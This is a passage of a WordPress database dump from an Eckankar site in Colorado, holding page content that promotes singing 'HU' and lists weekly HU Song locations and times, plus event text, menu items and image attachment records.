100px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>[ninja_form id=21]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Newsletter Subscription --PUBLIC','','publish','closed','closed','','newsletter-subscription-public','','','2019-12-26 16:20:30','2019-12-26 23:20:30','',0,'https://eckankar-colorado.org/?page_id=89020',0,'page','',0),(91821,2,'2019-08-05 11:08:54','2019-08-05 17:08:54','<div class=\"tmpl-video-5 boldgrid-section dynamic-gridblock\" style=\"background-image: url(\'https://source.unsplash.com/Sd8O2SgKDJA/1920x1080\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://source.unsplash.com/Sd8O2SgKDJA/1920x1080\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 90px; padding-bottom: 80px;\" data-bg-overlaycolor=\"rgba(255,255,255,0.93)\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8\">\r\n<h2 class=\"\">&nbsp;</h2>\r\n<h2 class=\"color1-color\" style=\"font-size: 65px; margin-top: 20px; margin-bottom: -57px; font-family: Raleway; font-weight: 600; font-style: normal; text-transform: none; text-shadow: #a0a0a0 0px 0px 7px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"normal\">The Essential<br>\r\nSacred Word.</h2>\r\n</div>\r\n<div class=\"col-md-4 col-xs-12 col-sm-4 align-column-bottom\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-video-2 boldgrid-section dynamic-gridblock\" style=\"background-image: linear-gradient(to left, #ffffff, #ffffff);\" data-bg-color-1=\"#FFFFFF\" data-bg-color-2=\"#FFFFFF\" data-bg-direction=\"to left\">\r\n<div class=\"container-fluid\"></div>\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; padding-bottom: 20px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 29px; font-weight: 400; color: #41527b; line-height: 1.3em; font-family: Lusitana;\" data-font-weight=\"400\" data-font-family=\"Lusitana\" data-font-style=\"\">The word is <strong>HU</strong>, an ancient carrier of love between Soul and Divine Spirit.</p>\r\n<p class=\"\" style=\"font-size: 19px; line-height: 1.6em; margin-top: 25px;\">This word is a tuning fork that aligns you with the Source of All Life—the ECK—the Life Force, the Holy Spirit. It instantly connects you to the Divine Source which is always working on your behalf.</p>\r\n<p class=\"\" style=\"font-size: 19px;\">Singing HU (pronounced like the word hue) for 20 minutes followed by 5 minutes of silence can enhance your spirituality, regardless of your path.<br>\r\n<br>\r\n</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-8 text-center\">\r\n<div class=\"bg-video bg-video-1 color3-border-color\" data-imhwpb-draggable=\"true\" style=\"margin: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/wc9N_g2NolA[/embed]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-audio-1 boldgrid-section dynamic-gridblock background-fixed\" style=\"background-image: linear-gradient(to left, rgba(255, 255, 255, 0.75), rgba(255, 255, 255, 0.75)), url(\'https://eckankar-colorado.org/wp-content/uploads/2019/08/ocean-2.jpg\'); background-size: cover; background-position: 50% 46%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ocean-2.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.75)\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 11px;\">\r\n<div class=\"col-md-7 col-xs-12 col-sm-12\">\r\n<div style=\"margin: 50px 0px; padding: 2em;\" class=\"color1-background-color color-1-text-contrast bg-background-color bg-box\">\r\n<h3 class=\"\" style=\"margin-bottom: 10px; color: #41527b;\">Experience the sound of soul</h3>\r\n<p class=\"\" style=\"font-size: 17px;\"><span style=\"color: #23507d;\"><em><strong>Thousands of voices singing \'HU\'</strong></em></span></p>\r\n<p>[embed linktext=\"Experience The Sound Of HU\"]https://eckankar-colorado.org/wp-content/uploads/2019/08/HU1.mp3[/embed]</p>\r\n<br>\r\n<br>\r\n<p class=\"\"><i class=\"fa fa-download fa-3x\" style=\"color: #23507d; margin-top: 0.5em;\" aria-hidden=\"true\"></i> <a class=\"\" style=\"font-size: 16px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2019/08/HU1.mp3\">Download HU – (Right click &amp; choose “Save Link As…”) </a></p>\r\n<p class=\"\"><i class=\"fa fa-thumbs-o-up fa-3x\" style=\"color: #23507d;\" aria-hidden=\"true\"></i> <a class=\"\" style=\"font-size: 16px;\" href=\"http://www.eckankar.org/Membership/invitation0.php\" target=\"_blank\" rel=\"noopener noreferrer\">Join 1 Year Advanced Spiritual Study Program</a></p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-5 col-sm-12 col-xs-12\">\r\n<div class=\"rt-grid-7 rt-alpha\">\r\n<div id=\"text-520006\" class=\"rt-block  widget_text widget\">\r\n<div class=\"module-surround\">\r\n<div class=\"module-content\">\r\n<div class=\"textwidget\">\r\n<p class=\"\" data-font-weight=\"600\">&nbsp;</p>\r\n<p class=\"color3-color\" style=\"font-size: 20px; font-weight: 600; margin-top: 2em;\" data-font-weight=\"600\">The sound of HU can swing open the door of imagination, sharpen your focus, and help open your heart to its fullest.</p>\r\n<br>\r\n<p class=\"color3-color\" style=\"font-size: 20px; font-weight: 600;\" data-font-weight=\"600\">HU (pronounced hue), owned by no one, is God’s gift to the world.</p>\r\n<br>\r\n<p class=\"color3-color\" style=\"font-size: 20px; font-weight: 600;\" data-font-weight=\"600\">Try it on your own, or come join us.</p>\r\n<p class=\"color3-color\" style=\"font-size: 17px; font-weight: 600;\" data-font-weight=\"600\"><i>(See below for locations and times.)</i></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-7 boldgrid-section dynamic-gridblock background-scroll\" style=\"background-color: #eeeeee;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 30px; padding-bottom: 39px;\">\r\n<div class=\"col-md-3 col-sm-3 col-xs-12 text-center align-column-center\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Central Colorado</h2>\r\n<p class=\"\"><strong>ECK Temple of Colorado<br>\r\n</strong><span style=\"color: #5380ad;\"><strong>&nbsp;</strong></span><span style=\"color: #333333;\">7100 W. Mississippi Ave.<br>\r\nLakewood, CO 80226</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong><br>\r\n</span><span style=\"color: #333333;\">Every 1st &amp; 3rd Sunday</span><br>\r\n<span style=\"color: #333333;\">10:30 - 11:00 a.m.</span><br>\r\n&nbsp;&nbsp;<a href=\"https://goo.gl/maps/MGTJNzdAFVMgMC2h7\">Get Directions</a>&nbsp;&nbsp;</p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<div>\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center align-column-center\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Colorado Springs</h2>\r\n<p class=\"\"><strong>Colorado Springs ECK Center<br>\r\n</strong><span style=\"color: #333333;\">5245 Centennial Blvd. Suite 100.<br>\r\n<i>Entrance on East Side of Building</i></span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong><br>\r\n</span><span style=\"color: #333333;\">Every 3rd Friday</span><br>\r\n<span style=\"color: #333333;\">7:00 - 7:30 p.m.</span><br>\r\n<a href=\"https://www.google.com/maps/place/5245+Centennial+Blvd+%23100,+Colorado+Springs,+CO+80919/@38.9083951,-104.8626702,17z/data=!4m2!3m1!1s0x871351c932b555ff:0x8e93ed35d918ee3d?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-3 col-xs-12 text-center align-column-center\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Golden</h2>\r\n<p class=\"\"><strong>Harmony Village/</strong><span style=\"color: #333333;\"><strong>Common House</strong><br>\r\n1001 Cottonwood Circle<br>\r\n(<em>Park on Illinois</em>)</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong> <br>\r\nEvery 1st Wednesday <br>\r\n7:00 - 7:30 pm</span> <br>\r\n<a href=\"http://maps.google.com/maps?q=1001+Cottonwood+Circle,+golden,+CO&amp;hl=en&amp;ll=39.740722,-105.213833&amp;spn=0.040589,0.104628&amp;sll=39.776392,-105.408819&amp;sspn=0.649084,1.674042&amp;hnear=1001+Cottonwood+Cir,+Golden,+Colorado+80401&amp;t=m&amp;z=14&amp;iwloc=A\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-3 col-xs-12 text-center align-column-center\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Longmont</h2>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>Longmont Public Library<br>\r\n</strong>409 4th Ave.<br>\r\nLongmont, CO</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong> <br>\r\n</span>&nbsp;Every 3rd Wednesday<br>\r\n7:00 pm- 7:30 p.m.<br>\r\n&nbsp;<a href=\"https://www.google.com/maps/place/409+4th+Ave,+Longmont,+CO+80501/@40.1652088,-105.1026922,17z/data=!3m1!4b1!4m5!3m4!1s0x876bf90a9d767b5b:0x7a81e9375fb99f25!8m2!3d40.1652088!4d-105.1005035?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-1 col-xs-12 text-center align-column-center\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Loveland</h2>\r\n<p class=\"\"><strong>Loveland ECK Center<br>\r\n</strong><span style=\"color: #333333;\">1135 N Lincoln<br>\r\nLoveland, CO</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong><br>\r\nEvery 1st Sunday</span><br>\r\n<span style=\"color: #333333;\">10:30 - 11:00 a.m.</span><br>\r\n<a href=\"http://maps.google.com/maps?q=1135+North+Lincoln+Avenue,+Loveland,+CO&amp;hl=en&amp;sll=39.967484,-105.159631&amp;sspn=0.020228,0.052314&amp;oq=1135+N+Lincoln,+Loveland,+CO&amp;hnear=1135+N+Lincoln+Ave,+Loveland,+Colorado+80537&amp;t=m&amp;z=16\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\" style=\"text-align: center;\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-1 col-xs-12 text-center align-column-center\" style=\"text-align: center;\">\r\n<div style=\"padding: 10% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Parker</h2>\r\n<p class=\"\"><strong>Parker Library<br>\r\n</strong><span style=\"color: #333333;\">20105 Main Street<br>\r\nParker, CO</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong><br>\r\n</span><span style=\"color: #333333;\">Every 1st Thursday</span><br>\r\n<span style=\"color: #333333;\">7:00 - 7:30 p.m.</span><br>\r\n<a href=\"https://www.google.com/maps/place/20105+Mainstreet,+Parker,+CO+80138/@39.5187258,-104.7569804,17z/data=!3m1!4b1!4m5!3m4!1s0x876c91f8fe8fa53b:0xd4f7e37717c6408a!8m2!3d39.5187217!4d-104.7547917?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-1 col-xs-12 text-center align-column-center\" style=\"text-align: center;\">\r\n<div style=\"padding: 7% 10px; margin-top: 10px; background-color: rgba(255, 255, 255, 0.8); color: #1d1d1d;\" class=\"bg-background-color bg-box\">\r\n<h2 class=\"sprocket-mosaic-title\" style=\"font-size: 22px; color: #41527b;\">Steamboat Springs</h2>\r\n<p class=\"\" style=\"font-size: 13px;\"><strong>Community Center<br>\r\nAmerican Legion Room<br>\r\n</strong><span style=\"color: #333333;\">1605 Lincoln Avenue<br>\r\nSteamboat Springs, CO</span></p>\r\n<p class=\"\"><span style=\"color: #333333;\"><strong>HU Song:</strong><br>\r\n</span><span style=\"color: #333333;\">Every 4th Thursday</span><br>\r\n<span style=\"color: #333333;\">5:30 - 6:00 p.m.</span><br>\r\n<a href=\"https://www.google.com/maps/place/1605+Lincoln+Ave,+Steamboat+Springs,+CO+80487/@40.4948244,-106.8536013,17z/data=!3m1!4b1!4m5!3m4!1s0x87426892984b8c93:0x59ed5495c431443a!8m2!3d40.4948203!4d-106.8514126?hl=en\" target=\"_blank\" rel=\"noopener noreferrer\">Get Directions</a></p>\r\n<div class=\"row bg-editor-hr-wrap\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<hr class=\"bg-hr\" style=\"border: 2px solid;\" width=\"50%\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-contact-8 boldgrid-section dynamic-gridblock\" style=\"background-color: rgba(255, 255, 255, 0.51);\">\r\n<div class=\"container\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a href=\"https://eckankar-colorado.org/contact-us/\"><strong>Contact Us</strong></a> | <a href=\"https://eckankar-colorado.org/\"> <strong>Eckankar In Colorado Website</strong></a></p>\r\n<p class=\"\" style=\"text-align: center;\">Copyright © 2009 - 2019 Colorado Satsang Society, Inc.,<br>\r\nA Chartered Affiliate of ECKANKAR<br>\r\nAll rights reserved</p>\r\n<div class=\"row\" style=\"padding-top: 15px; padding-bottom: 15px;\"></div>\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','HU Colorado - Landing page with locations - no header/footer','','draft','closed','closed','','hu-colorado','','','2022-01-07 10:37:34','2022-01-07 17:37:34','',0,'https://eckankar-colorado.org/?page_id=91821',0,'page','',0),(93410,2,'2019-08-06 13:33:26','2019-08-06 19:33:26','\"HU1\".','HU1','','inherit','open','closed','','hu1','','','2019-08-06 13:33:26','2019-08-06 19:33:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/HU1.mp3',0,'attachment','audio/mpeg',0),(94617,2,'2019-08-06 16:51:55','2019-08-06 22:51:55','','ocean-2','','inherit','open','closed','','ocean-2','','','2019-08-06 16:51:55','2019-08-06 22:51:55','',91821,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ocean-2.jpg',0,'attachment','image/jpeg',0),(98466,2,'2019-08-07 13:37:10','2019-08-07 19:37:10','','miracles_video','','inherit','open','closed','','miracles_video','','','2019-08-07 13:37:37','2019-08-07 19:37:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/miracles_video.jpg',0,'attachment','image/jpeg',0),(99531,2,'2019-08-07 15:07:32','2019-08-07 21:07:32','','modern-prophet-tabs-2','','inherit','open','closed','','modern-prophet-tabs-2','','','2019-08-07 15:07:32','2019-08-07 21:07:32','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/modern-prophet-tabs-2.jpg',0,'attachment','image/jpeg',0),(104339,2,'2019-08-08 15:13:29','2019-08-08 21:13:29','','login-bk-7','','inherit','open','closed','','login-bk-7','','','2019-08-08 15:13:29','2019-08-08 21:13:29','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/login-bk-7.jpg',0,'attachment','image/jpeg',0),(108956,2,'2019-08-09 14:51:10','2019-08-09 20:51:10','','Members Area','','publish','closed','closed','','link-to-member-test','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=108956',19,'nav_menu_item','',0),(109539,2,'2019-08-09 16:00:44','2019-08-09 22:00:44','','Member Ideas','','publish','closed','closed','','109539','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=109539',27,'nav_menu_item','',0),(109542,2,'2019-08-09 16:00:44','2019-08-09 22:00:44',' ','','','publish','closed','closed','','109542','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=109542',22,'nav_menu_item','',0),(109543,2,'2019-08-09 16:00:44','2019-08-09 22:00:44',' ','','','publish','closed','closed','','109543','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',0,'https://eckankar-colorado.org/?p=109543',23,'nav_menu_item','',0),(109544,2,'2019-08-09 16:00:44','2019-08-09 22:00:44',' ','','','publish','closed','closed','','109544','','','2019-12-26 14:51:11','2019-12-26 21:51:11','',79666,'https://eckankar-colorado.org/?p=109544',28,'nav_menu_item','',0),(114734,2,'2019-08-11 11:47:50','2019-08-11 17:47:50','<!-- EVENT #1 -->\r\n<p><span style=\"color: #666666;\">You’re invited to experience chanting HU, contemplative time, and spiritual conversation with others of like heart. The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul>\r\n	<li><span style=\"color: #666666;\">Inner peace and calm</span></li>\r\n	<li><span style=\"color: #666666;\">Divine love</span></li>\r\n	<li><span style=\"color: #666666;\">Expanded awareness</span></li>\r\n	<li><span style=\"color: #666666;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"color: #666666;\">Healing of the heart</span></li>\r\n</ul>\r\n<p><span style=\"color: #666666;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n<!-- EVENT #2 -->','Experience The Sound of Soul','','publish','closed','closed','','experience-the-sound-of-soul','','','2020-12-02 15:21:13','2020-12-02 22:21:13','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=114734',0,'tribe_events','',0),(120546,2,'2019-08-12 11:51:03','2019-08-12 17:51:03','','splash-ek-logo-white-1','','inherit','closed','closed','','splash-ek-logo-white-1','','','2019-08-12 11:51:03','2019-08-12 17:51:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/splash-ek-logo-white-1.png',0,'attachment','image/png',0),(120663,2,'2019-08-12 11:56:46','2019-08-12 17:56:46','','splash-ek-logo-white-2','','inherit','closed','closed','','splash-ek-logo-white-2','','','2019-08-12 11:56:46','2019-08-12 17:56:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/splash-ek-logo-white-2.png',0,'attachment','image/png',0),(123035,2,'2019-08-15 12:21:28','2019-08-15 18:21:28','','spex-accord-1','','inherit','closed','closed','','spex-accord-1','','','2019-08-15 12:21:28','2019-08-15 18:21:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-1.jpg',0,'attachment','image/jpeg',0),(123036,2,'2019-08-15 12:21:30','2019-08-15 18:21:30','','spex-accord-2','','inherit','closed','closed','','spex-accord-2','','','2019-08-15 12:21:30','2019-08-15 18:21:30','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-2.jpg',0,'attachment','image/jpeg',0),(123037,2,'2019-08-15 12:21:33','2019-08-15 18:21:33','','spex-accord-3','','inherit','closed','closed','','spex-accord-3','','','2019-08-15 12:21:33','2019-08-15 18:21:33','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-3.jpg',0,'attachment','image/jpeg',0),(123038,2,'2019-08-15 12:21:35','2019-08-15 18:21:35','','spex-accord-4','','inherit','closed','closed','','spex-accord-4','','','2019-08-15 12:21:35','2019-08-15 18:21:35','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-4.jpg',0,'attachment','image/jpeg',0),(123039,2,'2019-08-15 12:21:37','2019-08-15 18:21:37','','spex-accord-5','','inherit','closed','closed','','spex-accord-5','','','2019-08-15 12:21:37','2019-08-15 18:21:37','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-5.jpg',0,'attachment','image/jpeg',0),(123040,2,'2019-08-15 12:21:40','2019-08-15 18:21:40','','spex-accord-6','','inherit','closed','closed','','spex-accord-6','','','2019-08-15 12:21:40','2019-08-15 18:21:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/spex-accord-6.jpg',0,'attachment','image/jpeg',0),(124763,2,'2019-08-16 09:33:59','2019-08-16 15:33:59','','ECK_Temple_CO_015--o','','inherit','closed','closed','','eck_temple_co_015-o-2','','','2019-08-16 09:33:59','2019-08-16 15:33:59','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_015-o-1.jpg',0,'attachment','image/jpeg',0),(125419,2,'2022-03-06 14:19:50','0000-00-00 00:00:00','[supsystic-gallery id=\"2\"]','Gallery Preview','','draft','closed','closed','','','','','2022-03-06 14:19:50','2022-03-06 21:19:50','',0,'https://eckankar-colorado.org/?p=125419',0,'post','',0),(125651,2,'2019-08-16 15:35:23','2019-08-16 21:35:23','','ECK_Temple_CO_001-lg','','inherit','closed','closed','','eck_temple_co_001-lg','','','2019-08-16 15:35:23','2019-08-16 21:35:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_001-lg.jpg',0,'attachment','image/jpeg',0),(125652,2,'2019-08-16 15:35:26','2019-08-16 21:35:26','','ECK_Temple_CO_002-lg','','inherit','closed','closed','','eck_temple_co_002-lg','','','2019-08-16 15:35:26','2019-08-16 21:35:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_002-lg.jpg',0,'attachment','image/jpeg',0),(125653,2,'2019-08-16 15:35:28','2019-08-16 21:35:28','','ECK_Temple_CO_003-lg','','inherit','closed','closed','','eck_temple_co_003-lg','','','2019-08-16 15:35:28','2019-08-16 21:35:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg.jpg',0,'attachment','image/jpeg',0),(125654,2,'2019-08-16 15:35:31','2019-08-16 21:35:31','','ECK_Temple_CO_004-lg','','inherit','closed','closed','','eck_temple_co_004-lg','','','2019-08-16 15:35:31','2019-08-16 21:35:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_004-lg.jpg',0,'attachment','image/jpeg',0),(125655,2,'2019-08-16 15:35:33','2019-08-16 21:35:33','','ECK_Temple_CO_005-lg','','inherit','closed','closed','','eck_temple_co_005-lg','','','2019-08-16 15:35:33','2019-08-16 21:35:33','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_005-lg.jpg',0,'attachment','image/jpeg',0),(125656,2,'2019-08-16 15:35:36','2019-08-16 21:35:36','','ECK_Temple_CO_006-lg','','inherit','closed','closed','','eck_temple_co_006-lg','','','2019-08-16 15:35:36','2019-08-16 21:35:36','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_006-lg.jpg',0,'attachment','image/jpeg',0),(125657,2,'2019-08-16 15:35:38','2019-08-16 21:35:38','','ECK_Temple_CO_007-lg','','inherit','closed','closed','','eck_temple_co_007-lg','','','2019-08-16 15:35:38','2019-08-16 21:35:38','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_007-lg.jpg',0,'attachment','image/jpeg',0),(125658,2,'2019-08-16 15:35:41','2019-08-16 21:35:41','','ECK_Temple_CO_008-lg','','inherit','closed','closed','','eck_temple_co_008-lg','','','2019-08-16 15:35:41','2019-08-16 21:35:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_008-lg.jpg',0,'attachment','image/jpeg',0),(125659,2,'2019-08-16 15:35:44','2019-08-16 21:35:44','','ECK_Temple_CO_009-lg','','inherit','closed','closed','','eck_temple_co_009-lg','','','2019-08-16 15:35:44','2019-08-16 21:35:44','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_009-lg.jpg',0,'attachment','image/jpeg',0),(125660,2,'2019-08-16 15:35:47','2019-08-16 21:35:47','','ECK_Temple_CO_011-lg','','inherit','closed','closed','','eck_temple_co_011-lg','','','2019-08-16 15:35:47','2019-08-16 21:35:47','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_011-lg.jpg',0,'attachment','image/jpeg',0),(125661,2,'2019-08-16 15:35:52','2019-08-16 21:35:52','','ECK_Temple_CO_012-lg','','inherit','closed','closed','','eck_temple_co_012-lg','','','2019-08-16 15:35:52','2019-08-16 21:35:52','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_012-lg.jpg',0,'attachment','image/jpeg',0),(125662,2,'2019-08-16 15:35:55','2019-08-16 21:35:55','','ECK_Temple_CO_013-lg','','inherit','closed','closed','','eck_temple_co_013-lg','','','2019-08-16 15:35:55','2019-08-16 21:35:55','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_013-lg.jpg',0,'attachment','image/jpeg',0),(125663,2,'2019-08-16 15:35:57','2019-08-16 21:35:57','','ECK_Temple_CO_014-lg','','inherit','closed','closed','','eck_temple_co_014-lg','','','2019-08-16 15:35:57','2019-08-16 21:35:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_014-lg.jpg',0,'attachment','image/jpeg',0),(125664,2,'2019-08-16 15:36:00','2019-08-16 21:36:00','','ECK_Temple_CO_015-lg-o','','inherit','closed','closed','','eck_temple_co_015-lg-o','','','2019-08-16 15:36:00','2019-08-16 21:36:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_015-lg-o.jpg',0,'attachment','image/jpeg',0),(125665,2,'2019-08-16 15:36:03','2019-08-16 21:36:03','','ECK_Temple_CO_016-lg','','inherit','closed','closed','','eck_temple_co_016-lg','','','2019-08-16 15:36:03','2019-08-16 21:36:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_016-lg.jpg',0,'attachment','image/jpeg',0),(125666,2,'2019-08-16 15:36:05','2019-08-16 21:36:05','','ECK_Temple_CO_017-lg','','inherit','closed','closed','','eck_temple_co_017-lg','','','2019-08-16 15:36:05','2019-08-16 21:36:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_017-lg.jpg',0,'attachment','image/jpeg',0),(125667,2,'2019-08-16 15:36:08','2019-08-16 21:36:08','','ECK_Temple_CO_018-lg','','inherit','closed','closed','','eck_temple_co_018-lg','','','2019-08-16 15:36:08','2019-08-16 21:36:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_018-lg.jpg',0,'attachment','image/jpeg',0),(125668,2,'2019-08-16 15:36:12','2019-08-16 21:36:12','','ECK_Temple_CO_019-lg','','inherit','closed','closed','','eck_temple_co_019-lg','','','2019-08-16 15:36:12','2019-08-16 21:36:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_019-lg.jpg',0,'attachment','image/jpeg',0),(125669,2,'2019-08-16 15:36:15','2019-08-16 21:36:15','','ECK_Temple_CO_020-lg','','inherit','closed','closed','','eck_temple_co_020-lg','','','2019-08-16 15:36:15','2019-08-16 21:36:15','',0,'https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_020-lg.jpg',0,'attachment','image/jpeg',0),(125670,2,'2019-08-16 15:36:18','2019-08-16 